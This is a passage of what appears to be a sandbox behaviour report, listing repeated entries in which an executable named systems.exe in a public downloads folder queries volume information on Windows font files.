              Source: C:\Users\Public\Downloads\systems.exeQueries volume information: C:\Windows\Fonts\cambriaz.ttf VolumeInformationJump to behavior
              Source: C:\Users\Public\Downloads\systems.exeQueries volume information: C:\Windows\Fonts\Candara.ttf VolumeInformationJump to behavior
              Source: C:\Users\Public\Downloads\systems.exeQueries volume information: C:\Windows\Fonts\Candarai.ttf VolumeInformationJump to behavior
              Source: C:\Users\Public\Downloads\systems.exeQueries volume information: C:\Windows\Fonts\Candarab.ttf VolumeInformationJump to behavior
              Source: C:\Users\Public\Downloads\systems.exeQueries volume information: C:\Windows\Fonts\Candaraz.ttf VolumeInformationJump to behavior
              Source: C:\Users\Public\Downloads\systems.exeQueries volume information: C:\Windows\Fonts\comic.ttf VolumeInformationJump to behavior
              Source: C:\Users\Public\Downloads\systems.exeQueries volume information: C:\Windows\Fonts\comici.ttf VolumeInformationJump to behavior
              Source: C:\Users\Public\Downloads\systems.exeQueries volume information: C:\Windows\Fonts\comicbd.ttf VolumeInformationJump to behavior
              Source: C:\Users\Public\Downloads\systems.exeQueries volume information: C:\Windows\Fonts\comicz.ttf VolumeInformationJump to behavior
              Source: C:\Users\Public\Downloads\systems.exeQueries volume information: C:\Windows\Fonts\consola.ttf VolumeInformationJump to behavior
              Source: C:\Users\Public\Downloads\systems.exeQueries volume information: C:\Windows\Fonts\consolai.ttf VolumeInformationJump to behavior
              Source: C:\Users\Public\Downloads\systems.exeQueries volume information: C:\Windows\Fonts\consolab.ttf VolumeInformationJump to behavior
              Source: C:\Users\Public\Downloads\systems.exeQueries volume information: C:\Windows\Fonts\consolaz.ttf VolumeInformationJump to behavior
              Source: C:\Users\Public\Downloads\systems.exeQueries volume information: C:\Windows\Fonts\constan.ttf VolumeInformationJump to behavior
              Source: C:\Users\Public\Downloads\systems.exeQueries volume information: C:\Windows\Fonts\constani.ttf VolumeInformationJump to behavior
              Source: C:\Users\Public\Downloads\systems.exeQueries volume information: C:\Windows\Fonts\constanb.ttf VolumeInformationJump to behavior
              Source: C:\Users\Public\Downloads\systems.exeQueries volume information: C:\Windows\Fonts\constanz.ttf VolumeInformationJump to behavior
              Source: C:\Users\Public\Downloads\systems.exeQueries volume information: C:\Windows\Fonts\corbel.ttf VolumeInformationJump to behavior
              Source: C:\Users\Public\Downloads\systems.exeQueries volume information: C:\Windows\Fonts\corbeli.ttf VolumeInformationJump to behavior
              Source: C:\Users\Public\Downloads\systems.exeQueries volume information: C:\Windows\Fonts\corbelb.ttf VolumeInformationJump to behavior
              Source: C:\Users\Public\Downloads\systems.exeQueries volume information: C:\Windows\Fonts\corbelz.ttf VolumeInformationJump to behavior
              Source: C:\Users\Public\Downloads\systems.exeQueries volume information: C:\Windows\Fonts\cour.ttf VolumeInformationJump to behavior
              Source: C:\Users\Public\Downloads\systems.exeQueries volume information: C:\Windows\Fonts\couri.ttf VolumeInformationJump to behavior
              Source: C:\Users\Public\Downloads\systems.exeQueries volume information: C:\Windows\Fonts\courbd.ttf VolumeInformationJump to behavior
              Source: C:\Users\Public\Downloads\systems.exeQueries volume information: C:\Windows\Fonts\courbi.ttf VolumeInformationJump to behavior
              Source: C:\Users\Public\Downloads\systems.exeQueries volume information: C:\Windows\Fonts\ebrima.ttf VolumeInformationJump to behavior
              Source: C:\Users\Public\Downloads\systems.exeQueries volume information: C:\Windows\Fonts\ebrimabd.ttf VolumeInformationJump to behavior
              Source: C:\Users\Public\Downloads\systems.exeQueries volume information: C:\Windows\Fonts\framd.ttf VolumeInformationJump to behavior
              Source: C:\Users\Public\Downloads\systems.exeQueries volume information: C:\Windows\Fonts\FRADM.TTF VolumeInformationJump to behavior
              Source: C:\Users\Public\Downloads\systems.exeQueries volume information: C:\Windows\Fonts\framdit.ttf VolumeInformationJump to behavior
              Source: C:\Users\Public\Downloads\systems.exeQueries volume information: C:\Windows\Fonts\FRADMIT.TTF VolumeInformationJump to behavior
              Source: C:\Users\Public\Downloads\systems.exeQueries volume information: C:\Windows\Fonts\FRAMDCN.TTF VolumeInformationJump to behavior
              Source: C:\Users\Public\Downloads\systems.exeQueries volume information: C:\Windows\Fonts\FRADMCN.TTF VolumeInformationJump to behavior
              Source: C:\Users\Public\Downloads\systems.exeQueries volume information: C:\Windows\Fonts\FRAHV.TTF VolumeInformationJump to behavior
              Source: C:\Users\Public\Downloads\systems.exeQueries volume information: C:\Windows\Fonts\FRAHVIT.TTF VolumeInformationJump to behavior
              Source: C:\Users\Public\Downloads\systems.exeQueries volume information: C:\Windows\Fonts\Gabriola.ttf VolumeInformationJump to behavior
              Source: C:\Users\Public\Downloads\systems.exeQueries volume information: C:\Windows\Fonts\gadugi.ttf VolumeInformationJump to behavior
              Source: C:\Users\Public\Downloads\systems.exeQueries volume information: C:\Windows\Fonts\gadugib.ttf VolumeInformationJump to behavior
              Source: C:\Users\Public\Downloads\systems.exeQueries volume information: C:\Windows\Fonts\georgia.ttf VolumeInformationJump to behavior
              Source: C:\Users\Public\Downloads\systems.exeQueries volume information: C:\Windows\Fonts\georgiai.ttf VolumeInformationJump to behavior
              Source: C:\Users\Public\Downloads\systems.exeQueries volume information: C:\Windows\Fonts\georgiab.ttf VolumeInformationJump to behavior
              Source: C:\Users\Public\Downloads\systems.exeQueries volume information: C:\Windows\Fonts\georgiaz.ttf VolumeInformationJump to behavior
              Source: C:\Users\Public\Downloads\systems.exeQueries volume information: C:\Windows\Fonts\impact.ttf VolumeInformationJump to behavior
              Source: C:\Users\Public\Downloads\systems.exeQueries volume information: C:\Windows\Fonts\Inkfree.ttf VolumeInformationJump to behavior
              Source: C:\Users\Public\Downloads\systems.exeQueries volume information: C:\Windows\Fonts\javatext.ttf VolumeInformationJump to behavior
              Source: C:\Users\Public\Downloads\systems.exeQueries volume information: C:\Windows\Fonts\LeelawUI.ttf VolumeInformationJump to behavior
              Source: C:\Users\Public\Downloads\systems.exeQueries volume information: C:\Windows\Fonts\LeelUIsl.ttf VolumeInformationJump to behavior
              Source: C:\Users\Public\Downloads\systems.exeQueries volume information: C:\Windows\Fonts\LeelaUIb.ttf VolumeInformationJump to behavior
              Source: C:\Users\Public\Downloads\systems.exeQueries volume information: C:\Windows\Fonts\lucon.ttf VolumeInformationJump to behavior
              Source: C:\Users\Public\Downloads\systems.exeQueries volume information: C:\Windows\Fonts\l_10646.ttf VolumeInformationJump to behavior
              Source: C:\Users\Public\Downloads\systems.exeQueries volume information: C:\Windows\Fonts\malgun.ttf VolumeInformationJump to behavior
              Source: C:\Users\Public\Downloads\systems.exeQueries volume information: C:\Windows\Fonts\malgunsl.ttf VolumeInformationJump to behavior
              Source: C:\Users\Public\Downloads\systems.exeQueries volume information: C:\Windows\Fonts\malgunbd.ttf VolumeInformationJump to behavior
              Source: C:\Users\Public\Downloads\systems.exeQueries volume information: C:\Windows\Fonts\himalaya.ttf VolumeInformationJump to behavior
              Source: C:\Users\Public\Downloads\systems.exeQueries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformationJump to behavior
              Source: C:\Users\Public\Downloads\systems.exeQueries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformationJump to behavior
              Source: C:\Users\Public\Downloads\systems.exeQueries volume information: C:\Windows\Fonts\msjhbd.ttc VolumeInformationJump to behavior
              Source: C:\Users\Public\Downloads\systems.exeQueries volume information: C:\Windows\Fonts\ntailu.ttf VolumeInformationJump to behavior
              Source: C:\Users\Public\Downloads\systems.exeQueries volume information: C:\Windows\Fonts\ntailub.ttf VolumeInformationJump to behavior
              Source: C:\Users\Public\Downloads\systems.exeQueries volume information: C:\Windows\Fonts\phagspa.ttf VolumeInformationJump to behavior
              Source: C:\Users\Public\Downloads\systems.exeQueries volume information: C:\Windows\Fonts\phagspab.ttf VolumeInformationJump to behavior
              Source: C:\Users\Public\Downloads\systems.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformationJump to behavior
              Source: C:\Users\Public\Downloads\systems.exeQueries volume information: C:\Windows\Fonts\taile.ttf VolumeInformationJump to behavior
              Source: C:\Users\Public\Downloads\systems.exeQueries volume information: C:\Windows\Fonts\taileb.ttf VolumeInformationJump to behavior
              Source: C:\Users\Public\Downloads\systems.exeQueries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformationJump to behavior
              Source: C:\Users\Public\Downloads\systems.exeQueries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformationJump to behavior
              Source: C:\Users\Public\Downloads\systems.exeQueries volume information: C:\Windows\Fonts\msyhbd.ttc VolumeInformationJump to behavior
              Source: C:\Users\Public\Downloads\systems.exeQueries volume information: C:\Windows\Fonts\msyi.ttf VolumeInformationJump to behavior
              Source: C:\Users\Public\Downloads\systems.exeQueries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformationJump to behavior
              Source: C:\Users\Public\Downloads\systems.exeQueries volume information: C:\Windows\Fonts\monbaiti.ttf VolumeInformationJump to behavior
              Source: C:\Users\Public\Downloads\systems.exeQueries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformationJump to behavior
              Source: C:\Users\Public\Downloads\systems.exeQueries volume information: C:\Windows\Fonts\mvboli.ttf VolumeInformationJump to behavior
              Source: C:\Users\Public\Downloads\systems.exeQueries volume information: C:\Windows\Fonts\mmrtext.ttf VolumeInformationJump to behavior
              Source: C:\Users\Public\Downloads\systems.exeQueries volume information: C:\Windows\Fonts\mmrtextb.ttf VolumeInformationJump to behavior
              Source: C:\Users\Public\Downloads\systems.exeQueries volume information: C:\Windows\Fonts\Nirmala.ttf VolumeInformationJump to behavior
              Source: C:\Users\Public\Downloads\systems.exeQueries volume information: C:\Windows\Fonts\NirmalaS.ttf VolumeInformationJump to behavior
              Source: C:\Users\Public\Downloads\systems.exeQueries volume information: C:\Windows\Fonts\NirmalaB.ttf VolumeInformationJump to behavior
              Source: C:\Users\Public\Downloads\systems.exeQueries volume information: C:\Windows\Fonts\pala.ttf VolumeInformationJump to behavior
              Source: C:\Users\Public\Downloads\systems.exeQueries volume information: C:\Windows\Fonts\palai.ttf VolumeInformationJump to behavior
              Source: C:\Users\Public\Downloads\systems.exeQueries volume information: C:\Windows\Fonts\palab.ttf VolumeInformationJump to behavior
              Source: C:\Users\Public\Downloads\systems.exeQueries volume information: C:\Windows\Fonts\palabi.ttf VolumeInformationJump to behavior
              Source: C:\Users\Public\Downloads\systems.exeQueries volume information: C:\Windows\Fonts\segoepr.ttf VolumeInformationJump to behavior
              Source: C:\Users\Public\Downloads\systems.exeQueries volume information: C:\Windows\Fonts\segoeprb.ttf VolumeInformationJump to behavior
              Source: C:\Users\Public\Downloads\systems.exeQueries volume information: C:\Windows\Fonts\segoesc.ttf VolumeInformationJump to behavior
              Source: C:\Users\Public\Downloads\systems.exeQueries volume information: C:\Windows\Fonts\segoescb.ttf VolumeInformationJump to behavior
              Source: C:\Users\Public\Downloads\systems.exeQueries volume information: C:\Windows\Fonts\segoeuii.ttf VolumeInformationJump to behavior
              Source: C:\Users\Public\Downloads\systems.exeQueries volume information: C:\Windows\Fonts\seguisli.ttf VolumeInformationJump to behavior
              Source: C:\Users\Public\Downloads\systems.exeQueries volume information: C:\Windows\Fonts\seguili.ttf VolumeInformationJump to behavior
              Source: C:\Users\Public\Downloads\systems.exeQueries volume information: C:\Windows\Fonts\seguisbi.ttf VolumeInformationJump to behavior
              Source: C:\Users\Public\Downloads\systems.exeQueries volume information: C:\Windows\Fonts\segoeuiz.ttf VolumeInformationJump to behavior
              Source: C:\Users\Public\Downloads\systems.exeQueries volume information: C:\Windows\Fonts\seguibl.ttf VolumeInformationJump to behavior
              Source: C:\Users\Public\Downloads\systems.exeQueries volume information: C:\Windows\Fonts\seguibli.ttf VolumeInformationJump to behavior
              Source: C:\Users\Public\Downloads\systems.exeQueries volume information: C:\Windows\Fonts\seguiemj.ttf VolumeInformationJump to behavior
              Source: C:\Users\Public\Downloads\systems.exeQueries volume information: C:\Windows\Fonts\seguihis.ttf VolumeInformationJump to behavior
              Source: C:\Users\Public\Downloads\systems.exeQueries volume information: C:\Windows\Fonts\seguisym.ttf VolumeInformationJump to behavior
              Source: C:\Users\Public\Downloads\systems.exeQueries volume information: C:\Windows\Fonts\simsun.ttc VolumeInformationJump to behavior
              Source: C:\Users\Public\Downloads\systems.exeQueries volume information: C:\Windows\Fonts\simsunb.ttf VolumeInformationJump to behavior
              Source: C:\Users\Public\Downloads\systems.exeQueries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformationJump to behavior
              Source: C:\Users\Public\Downloads\systems.exeQueries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformationJump to behavior
              Source: C:\Users\Public\Downloads\systems.exeQueries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformationJump to behavior
              Source: C:\Users\Public\Downloads\systems.exeQueries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformationJump to behavior
              Source: C:\Users\Public\Downloads\systems.exeQueries volume information: C:\Windows\Fonts\sylfaen.ttf VolumeInformationJump to behavior
              Source: C:\Users\Public\Downloads\systems.exeQueries volume information: C:\Windows\Fonts\symbol.ttf VolumeInformationJump to behavior
              Source: C:\Users\Public\Downloads\systems.exeQueries volume information: C:\Windows\Fonts\tahoma.ttf VolumeInformationJump to behavior
              Source: C:\Users\Public\Downloads\systems.exeQueries volume information: C:\Windows\Fonts\tahomabd.ttf VolumeInformationJump to behavior
              Source: C:\Users\Public\Downloads\systems.exeQueries volume information: C:\Windows\Fonts\timesi.ttf VolumeInformationJump to behavior
              Source: C:\Users\Public\Downloads\systems.exeQueries volume information: C:\Windows\Fonts\timesbd.ttf VolumeInformationJump to behavior
              Source: C:\Users\Public\Downloads\systems.exeQueries volume information: C:\Windows\Fonts\timesbi.ttf VolumeInformationJump to behavior
              Source: C:\Users\Public\Downloads\systems.exeQueries volume information: C:\Windows\Fonts\trebuc.ttf VolumeInformationJump to behavior
              Source: C:\Users\Public\Downloads\systems.exeQueries volume information: C:\Windows\Fonts\trebucit.ttf VolumeInformationJump to behavior
              Source: C:\Users\Public\Downloads\systems.exeQueries volume information: C:\Windows\Fonts\trebucbd.ttf VolumeInformationJump to behavior
              Source: C:\Users\Public\Downloads\systems.exeQueries volume information: C:\Windows\Fonts\trebucbi.ttf VolumeInformationJump to behavior
              Source: C:\Users\Public\Downloads\systems.exeQueries volume information: C:\Windows\Fonts\verdana.ttf VolumeInformationJump to behavior
              Source: C:\Users\Public\Downloads\systems.exeQueries volume information: C:\Windows\Fonts\verdanai.ttf VolumeInformationJump to behavior
              Source: C:\Users\Public\Downloads\systems.exeQueries volume information: C:\Windows\Fonts\verdanab.ttf VolumeInformationJump to behavior
              Source: C:\Users\Public\Downloads\systems.exeQueries volume information: C:\Windows\Fonts\verdanaz.ttf VolumeInformationJump to behavior
              Source: C:\Users\Public\Downloads\systems.exeQueries volume information: C:\Windows\Fonts\webdings.ttf VolumeInformationJump to behavior
              Source: C:\Users\Public\Downloads\systems.exeQueries volume information: C:\Windows\Fonts\wingding.ttf VolumeInformationJump to behavior
              Source: C:\Users\Public\Downloads\systems.exeQueries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformationJump to behavior
              Source: C:\Users\Public\Downloads\systems.exeQueries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformationJump to behavior
              Source: C:\Users\Public\Downloads\systems.exeQueries volume information: C:\Windows\Fonts\YuGothL.ttc VolumeInformationJump to behavior
              Source: C:\Users\Public\Downloads\systems.exeQueries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformationJump to behavior
              Source: C:\Users\Public\Downloads\systems.exeQueries volume information: C:\Windows\Fonts\holomdl2.ttf VolumeInformationJump to behavior
              Source: C:\Users\Public\Downloads\systems.exeQueries volume information: C:\Windows\Fonts\CENTURY.TTF VolumeInformationJump to behavior
              Source: C:\Users\Public\Downloads\systems.exeQueries volume information: C:\Windows\Fonts\LEELAWAD.TTF VolumeInformationJump to behavior
              Source: C:\Users\Public\Downloads\systems.exeQueries volume information: C:\Windows\Fonts\LEELAWDB.TTF VolumeInformationJump to behavior
              Source: C:\Users\Public\Downloads\systems.exeQueries volume information: C:\Windows\Fonts\MSUIGHUR.TTF VolumeInformationJump to behavior
              Source: C:\Users\Public\Downloads\systems.exeQueries volume information: C:\Windows\Fonts\MSUIGHUB.TTF VolumeInformationJump to behavior
              Source: C:\Users\Public\Downloads\systems.exeQueries volume information: C:\Windows\Fonts\WINGDNG2.TTF VolumeInformationJump to behavior
              Source: C:\Users\Public\Downloads\systems.exeQueries volume information: C:\Windows\Fonts\WINGDNG3.TTF VolumeInformationJump to behavior
              Source: C:\Users\Public\Downloads\systems.exeQueries volume information: C:\Windows\Fonts\TEMPSITC.TTF VolumeInformationJump to behavior
              Source: C:\Users\Public\Downloads\systems.exeQueries volume information: C:\Windows\Fonts\PRISTINA.TTF VolumeInformationJump to behavior
              Source: C:\Users\Public\Downloads\systems.exeQueries volume information: C:\Windows\Fonts\PAPYRUS.TTF VolumeInformationJump to behavior
              Source: C:\Users\Public\Downloads\systems.exeQueries volume information: C:\Windows\Fonts\MISTRAL.TTF VolumeInformationJump to behavior
              Source: C:\Users\Public\Downloads\systems.exeQueries volume information: C:\Windows\Fonts\LHANDW.TTF VolumeInformationJump to behavior
              Source: C:\Users\Public\Downloads\systems.exeQueries volume information: C:\Windows\Fonts\ITCKRIST.TTF VolumeInformationJump to behavior
              Source: C:\Users\Public\Downloads\systems.exeQueries volume information: C:\Windows\Fonts\JUICE___.TTF VolumeInformationJump to behavior
              Source: C:\Users\Public\Downloads\systems.exeQueries volume information: C:\Windows\Fonts\FRSCRIPT.TTF VolumeInformationJump to behavior
              Source: C:\Users\Public\Downloads\systems.exeQueries volume information: C:\Windows\Fonts\FREESCPT.TTF VolumeInformationJump to behavior
              Source: C:\Users\Public\Downloads\systems.exeQueries volume information: C:\Windows\Fonts\BRADHITC.TTF VolumeInformationJump to behavior
              Source: C:\Users\Public\Downloads\systems.exeQueries volume information: C:\Windows\Fonts\OUTLOOK.TTF VolumeInformationJump to behavior
              Source: C:\Users\Public\Downloads\systems.exeQueries volume information: C:\Windows\Fonts\BKANT.TTF VolumeInformationJump to behavior
              Source: C:\Users\Public\Downloads\systems.exeQueries volume information: C:\Windows\Fonts\ANTQUAI.TTF VolumeInformationJump to behavior
              Source: C:\Users\Public\Downloads\systems.exeQueries volume information: C:\Windows\Fonts\ANTQUAB.TTF VolumeInformationJump to behavior
              Source: C:\Users\Public\Downloads\systems.exeQueries volume information: C:\Windows\Fonts\ANTQUABI.TTF VolumeInformationJump to behavior
              Source: C:\Users\Public\Downloads\systems.exeQueries volume information: C:\Windows\Fonts\GARA.TTF VolumeInformationJump to behavior
              Source: C:\Users\Public\Downloads\systems.exeQueries volume information: C:\Windows\Fonts\GARAIT.TTF VolumeInformationJump to behavior
              Source: C:\Users\Public\Downloads\systems.exeQueries volume information: C:\Windows\Fonts\GARABD.TTF VolumeInformationJump to behavior
              Source: C:\Users\Public\Downloads\systems.exeQueries volume information: C:\Windows\Fonts\MTCORSVA.TTF VolumeInformationJump to behavior
              Source: C:\Users\Public\Downloads\systems.exeQueries volume information: C:\Windows\Fonts\GOTHIC.TTF VolumeInformationJump to behavior
              Source: C:\Users\Public\Downloads\systems.exeQueries volume information: C:\Windows\Fonts\GOTHICI.TTF VolumeInformationJump to behavior
              Source: C:\Users\Public\Downloads\systems.exeQueries volume information: C:\Windows\Fonts\GOTHICB.TTF VolumeInformationJump to behavior
              Source: C:\Users\Public\Downloads\systems.exeQueries volume information: C:\Windows\Fonts\GOTHICBI.TTF VolumeInformationJump to behavior
              Source: C:\Users\Public\Downloads\systems.exeQueries volume information: C:\Windows\Fonts\ALGER.TTF VolumeInformationJump to behavior
              Source: C:\Users\Public\Downloads\systems.exeQueries volume information: C:\Windows\Fonts\BASKVILL.TTF VolumeInformationJump to behavior
              Source: C:\Users\Public\Downloads\systems.exeQueries volume information: C:\Windows\Fonts\BAUHS93.TTF VolumeInformationJump to behavior
              Source: C:\Users\Public\Downloads\systems.exeQueries volume information: C:\Windows\Fonts\BELL.TTF VolumeInformationJump to behavior
              Source: C:\Users\Public\Downloads\systems.exeQueries volume information: C:\Windows\Fonts\BELLI.TTF VolumeInformationJump to behavior
              Source: C:\Users\Public\Downloads\systems.exeQueries volume information: C:\Windows\Fonts\BELLB.TTF VolumeInformationJump to behavior
              Source: C:\Users\Public\Downloads\systems.exeQueries volume information: C:\Windows\Fonts\BRLNSR.TTF VolumeInformationJump to behavior
              Source: C:\Users\Public\Downloads\systems.exeQueries volume information: C:\Windows\Fonts\BRLNSDB.TTF VolumeInformationJump to behavior
              Source: C:\Users\Public\Downloads\systems.exeQueries volume information: C:\Windows\Fonts\BRLNSB.TTF VolumeInformationJump to behavior
              Source: C:\Users\Public\Downloads\systems.exeQueries volume information: C:\Windows\Fonts\BERNHC.TTF VolumeInformationJump to behavior
              Source: C:\Users\Public\Downloads\systems.exeQueries volume information: C:\Windows\Fonts\BOD_PSTC.TTF VolumeInformationJump to behavior
              Source: C:\Users\Public\Downloads\systems.exeQueries volume information: C:\Windows\Fonts\BRITANIC.TTF VolumeInformationJump to behavior
              Source: C:\Users\Public\Downloads\systems.exeQueries volume information: C:\Windows\Fonts\BROADW.TTF VolumeInformationJump to behavior
              Source: C:\Users\Public\Downloads\systems.exeQueries volume information: C:\Windows\Fonts\BRUSHSCI.TTF VolumeInformationJump to behavior
              Source: C:\Users\Public\Downloads\systems.exeQueries volume information: C:\Windows\Fonts\CALIFR.TTF VolumeInformationJump to behavior
              Source: C:\Users\Public\Downloads\systems.exeQueries volume information: C:\Windows\Fonts\CALIFI.TTF VolumeInformationJump to behavior
              Source: C:\Users\Public\Downloads\systems.exeQueries volume information: C:\Windows\Fonts\CALIFB.TTF VolumeInformationJump to behavior
              Source: C:\Users\Public\Downloads\systems.exeQueries volume information: C:\Windows\Fonts\CENTAUR.TTF VolumeInformationJump to behavior
              Source: C:\Users\Public\Downloads\systems.exeQueries volume information: C:\Windows\Fonts\CHILLER.TTF VolumeInformationJump to behavior
              Source: C:\Users\Public\Downloads\systems.exeQueries volume information: C:\Windows\Fonts\COLONNA.TTF VolumeInformationJump to behavior
              Source: C:\Users\Public\Downloads\systems.exeQueries volume information: C:\Windows\Fonts\COOPBL.TTF VolumeInformationJump to behavior
              Source: C:\Users\Public\Downloads\systems.exeQueries volume information: C:\Windows\Fonts\FTLTLT.TTF VolumeInformationJump to behavior
              Source: C:\Users\Public\Downloads\systems.exeQueries volume information: C:\Windows\Fonts\HARLOWSI.TTF VolumeInformationJump to behavior
              Source: C:\Users\Public\Downloads\systems.exeQueries volume information: C:\Windows\Fonts\HARNGTON.TTF VolumeInformationJump to behavior
              Source: C:\Users\Public\Downloads\systems.exeQueries volume information: C:\Windows\Fonts\HTOWERT.TTF VolumeInformationJump to behavior
              Source: C:\Users\Public\Downloads\systems.exeQueries volume information: C:\Windows\Fonts\HTOWERTI.TTF VolumeInformationJump to behavior
              Source: C:\Users\Public\Downloads\systems.exeQueries volume information: C:\Windows\Fonts\JOKERMAN.TTF VolumeInformationJump to behavior
              Source: C:\Users\Public\Downloads\systems.exeQueries volume information: C:\Windows\Fonts\KUNSTLER.TTF VolumeInformationJump to behavior
              Source: C:\Users\Public\Downloads\systems.exeQueries volume information: C:\Windows\Fonts\LBRITE.TTF VolumeInformationJump to behavior
              Source: C:\Users\Public\Downloads\systems.exeQueries volume information: C:\Windows\Fonts\LBRITED.TTF VolumeInformationJump to behavior
              Source: C:\Users\Public\Downloads\systems.exeQueries volume information: C:\Windows\Fonts\LBRITEI.TTF VolumeInformationJump to behavior
              Source: C:\Users\Public\Downloads\systems.exeQueries volume information: C:\Windows\Fonts\LBRITEDI.TTF VolumeInformationJump to behavior
              Source: C:\Users\Public\Downloads\systems.exeQueries volume information: C:\Windows\Fonts\LCALLIG.TTF VolumeInformationJump to behavior
              Source: C:\Users\Public\Downloads\systems.exeQueries volume information: C:\Windows\Fonts\LFAX.TTF VolumeInformationJump to behavior
              Source: C:\Users\Public\Downloads\systems.exeQueries volume information: C:\Windows\Fonts\LFAXD.TTF VolumeInformationJump to behavior
              Source: C:\Users\Public\Downloads\systems.exeQueries volume information: C:\Windows\Fonts\LFAXI.TTF VolumeInformationJump to behavior
              Source: C:\Users\Public\Downloads\systems.exeQueries volume information: C:\Windows\Fonts\LFAXDI.TTF VolumeInformationJump to behavior
              Source: C:\Users\Public\Downloads\systems.exeQueries volume information: C:\Windows\Fonts\MAGNETOB.TTF VolumeInformationJump to behavior
              Source: C:\Users\Public\Downloads\systems.exeQueries volume information: C:\Windows\Fonts\MATURASC.TTF VolumeInformationJump to behavior
              Source: C:\Users\Public\Downloads\systems.exeQueries volume information: C:\Windows\Fonts\MOD20.TTF VolumeInformationJump to behavior
              Source: C:\Users\Public\Downloads\systems.exeQueries volume information: C:\Windows\Fonts\NIAGENG.TTF VolumeInformationJump to behavior
              Source: C:\Users\Public\Downloads\systems.exeQueries volume information: C:\Windows\Fonts\NIAGSOL.TTF VolumeInformationJump to behavior
              Source: C:\Users\Public\Downloads\systems.exeQueries volume information: C:\Windows\Fonts\OLDENGL.TTF VolumeInformationJump to behavior
              Source: C:\Users\Public\Downloads\systems.exeQueries volume information: C:\Windows\Fonts\ONYX.TTF VolumeInformationJump to behavior
              Source: C:\Users\Public\Downloads\systems.exeQueries volume information: C:\Windows\Fonts\PARCHM.TTF VolumeInformationJump to behavior
              Source: C:\Users\Public\Downloads\systems.exeQueries volume information: C:\Windows\Fonts\PLAYBILL.TTF VolumeInformationJump to behavior
              Source: C:\Users\Public\Downloads\systems.exeQueries volume information: C:\Windows\Fonts\POORICH.TTF VolumeInformationJump to behavior
              Source: C:\Users\Public\Downloads\systems.exeQueries volume information: C:\Windows\Fonts\RAVIE.TTF VolumeInformationJump to behavior
              Source: C:\Users\Public\Downloads\systems.exeQueries volume information: C:\Windows\Fonts\INFROMAN.TTF VolumeInformationJump to behavior
              Source: C:\Users\Public\Downloads\systems.exeQueries volume information: C:\Windows\Fonts\SHOWG.TTF VolumeInformationJump to behavior
              Source: C:\Users\Public\Downloads\systems.exeQueries volume information: C:\Windows\Fonts\SNAP____.TTF VolumeInformationJump to behavior
              Source: C:\Users\Public\Downloads\systems.exeQueries volume information: C:\Windows\Fonts\STENCIL.TTF VolumeInformationJump to behavior
              Source: C:\Users\Public\Downloads\systems.exeQueries volume information: C:\Windows\Fonts\VINERITC.TTF VolumeInformationJump to behavior
              Source: C:\Users\Public\Downloads\systems.exeQueries volume information: C:\Windows\Fonts\VIVALDII.TTF VolumeInformationJump to behavior
              Source: C:\Users\Public\Downloads\systems.exeQueries volume information: C:\Windows\Fonts\VLADIMIR.TTF VolumeInformationJump to behavior
              Source: C:\Users\Public\Downloads\systems.exeQueries volume information: C:\Windows\Fonts\LATINWD.TTF VolumeInformationJump to behavior
              Source: C:\Users\Public\Downloads\systems.exeQueries volume information: C:\Windows\Fonts\TCM_____.TTF VolumeInformationJump to behavior
              Source: C:\Users\Public\Downloads\systems.exeQueries volume information: C:\Windows\Fonts\TCMI____.TTF VolumeInformationJump to behavior
              Source: C:\Users\Public\Downloads\systems.exeQueries volume information: C:\Windows\Fonts\TCB_____.TTF VolumeInformationJump to behavior
              Source: C:\Users\Public\Downloads\systems.exeQueries volume information: C:\Windows\Fonts\TCBI____.TTF VolumeInformationJump to behavior
              Source: C:\Users\Public\Downloads\systems.exeQueries volume information: C:\Windows\Fonts\TCCM____.TTF VolumeInformationJump to behavior
              Source: C:\Users\Public\Downloads\systems.exeQueries volume information: C:\Windows\Fonts\TCCB____.TTF VolumeInformationJump to behavior
              Source: C:\Users\Public\Downloads\systems.exeQueries volume information: C:\Windows\Fonts\TCCEB.TTF VolumeInformationJump to behavior
              Source: C:\Users\Public\Downloads\systems.exeQueries volume information: C:\Windows\Fonts\SCRIPTBL.TTF VolumeInformationJump to behavior
              Source: C:\Users\Public\Downloads\systems.exeQueries volume information: C:\Windows\Fonts\ROCK.TTF VolumeInformationJump to behavior
              Source: C:\Users\Public\Downloads\systems.exeQueries volume information: C:\Windows\Fonts\ROCKI.TTF VolumeInformationJump to behavior
              Source: C:\Users\Public\Downloads\systems.exeQueries volume information: C:\Windows\Fonts\ROCKB.TTF VolumeInformationJump to behavior
              Source: C:\Users\Public\Downloads\systems.exeQueries volume information: C:\Windows\Fonts\ROCKEB.TTF VolumeInformationJump to behavior
              Source: C:\Users\Public\Downloads\systems.exeQueries volume information: C:\Windows\Fonts\ROCKBI.TTF VolumeInformationJump to behavior
              Source: C:\Users\Public\Downloads\systems.exeQueries volume information: C:\Windows\Fonts\ROCC____.TTF VolumeInformationJump to behavior
              Source: C:\Users\Public\Downloads\systems.exeQueries volume information: C:\Windows\Fonts\ROCCB___.TTF VolumeInformationJump to behavior
              Source: C:\Users\Public\Downloads\systems.exeQueries volume information: C:\Windows\Fonts\RAGE.TTF VolumeInformationJump to behavior
              Source: C:\Users\Public\Downloads\systems.exeQueries volume information: C:\Windows\Fonts\PERTILI.TTF VolumeInformationJump to behavior
              Source: C:\Users\Public\Downloads\systems.exeQueries volume information: C:\Windows\Fonts\PERTIBD.TTF VolumeInformationJump to behavior
              Source: C:\Users\Public\Downloads\systems.exeQueries volume information: C:\Windows\Fonts\PER_____.TTF VolumeInformationJump to behavior
              Source: C:\Users\Public\Downloads\systems.exeQueries volume information: C:\Windows\Fonts\PERI____.TTF VolumeInformationJump to behavior
              Source: C:\Users\Public\Downloads\systems.exeQueries volume information: C:\Windows\Fonts\PERB____.TTF VolumeInformationJump to behavior
              Source: C:\Users\Public\Downloads\systems.exeQueries volume information: C:\Windows\Fonts\PERBI___.TTF VolumeInformationJump to behavior
